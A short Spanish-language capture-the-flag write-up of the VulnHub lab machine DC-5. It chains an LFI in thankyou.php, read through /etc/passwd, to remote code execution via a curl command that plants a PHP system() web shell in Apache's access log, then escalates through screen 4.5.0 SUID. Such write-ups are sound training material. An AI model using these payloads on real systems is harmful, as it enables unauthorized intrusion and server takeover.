DC-5 - VulnHub

// CLASSIFIED OPERATION REPORT //

DC-5 - VulnHub

LFI detectado por comportamiento dinámico, log poisoning a RCE y screen 4.5.0 SUID LPE.

VULNHUB MEDIUM 4 de julio de 2024
#LFI#Log Poisoning#screen 4.5.0#RCE#Linux
Realizado en entornos autorizados. Solo con fines educativos.

DC-5 es excelente para entrenar el ojo: la vulnerabilidad no está en un parámetro obvio sino en un comportamiento dinámico de la página.

Servicios: 80 HTTP · 111 rpcbind · 47648

1. Detección del LFI

El año del footer cambia al refrescar la página. Eso revela que thankyou.php incluye dinámicamente footer.php, y que el parámetro file es un Local File Inclusion:

http://target/thankyou.php?file=/etc/passwd

2. Log poisoning → RCE

Inyectamos código PHP en el access log de Apache a través de la cabecera User-Agent, y luego incluimos el log vía el LFI para ejecutarlo:

curl -A '<?php system($_GET["c"]); ?>' http://target/
# luego: thankyou.php?file=/var/log/apache2/access.log&c=<reverse shell>

3. Escalada — screen 4.5.0

El sistema tiene screen 4.5.0 con SUID, vulnerable a una LPE pública:

# exploit screen-v4.5.0-priv-escalate → root

Conceptos aplicados

  • LFI identificado por comportamiento dinámico (no por un parámetro evidente).
  • Log poisoning para convertir LFI en RCE.
  • screen 4.5.0 SUID LPE.